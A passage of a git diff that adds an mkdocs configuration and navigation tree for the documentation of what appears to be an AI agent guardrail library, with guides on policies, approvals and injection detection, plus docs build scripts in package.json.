pymdownx.emoji: + emoji_index: !!python/name:material.extensions.emoji.twemoji + emoji_generator: !!python/name:material.extensions.emoji.to_svg + - attr_list + - md_in_html + - toc: + permalink: true + +nav: + - Home: index.md + - Getting Started: + - Installation: getting-started/installation.md + - Quick Start: getting-started/quick-start.md + - Core Concepts: getting-started/concepts.md + - Guides: + - Policy Engine: guides/policy-engine.md + - Preset Policies: guides/preset-policies.md + - External Backends: guides/external-backends.md + - Approval Workflows: guides/approval-workflows.md + - Argument Validation: guides/argument-validation.md + - Injection Detection: guides/injection-detection.md + - Output Filtering: guides/output-filtering.md + - Rate Limiting: guides/rate-limiting.md + - OpenTelemetry: guides/opentelemetry.md + - MCP Drift Detection: guides/mcp-drift-detection.md + - Simulation & Dry-Run: guides/simulation.md + - Conversation-Aware Policies: guides/conversation-aware-policies.md + - Error Handling: guides/error-handling.md + - Decision Records: guides/decision-records.md + - API Reference: + - Overview: api/index.md + - Core: api/core.md + - Policy: api/policy.md + - Approval: api/approval.md + - Guards: api/guards.md + - OpenTelemetry: api/otel.md + - MCP: api/mcp.md + - Types: api/types.md + - Examples: + - Next.js Integration: examples/nextjs-integration.md + - Chatbot Safety: examples/chatbot-safety.md + - Multi-Tenant Policies: examples/multi-tenant.md + - Audit Logging: examples/audit-logging.md diff --git a/package.json b/package.json index 8c2a036..de8cda7 100644 --- a/package.json +++ b/package.json @@ -42,6 +42,8 @@ "test": "vitest run", "test:watch": "vitest", "lint": "tsc --noEmit", + "docs:build": "mkdocs build --strict", + "docs:serve": "mkdocs serve", "prepublishOnly": "npm run build" }, "repository": {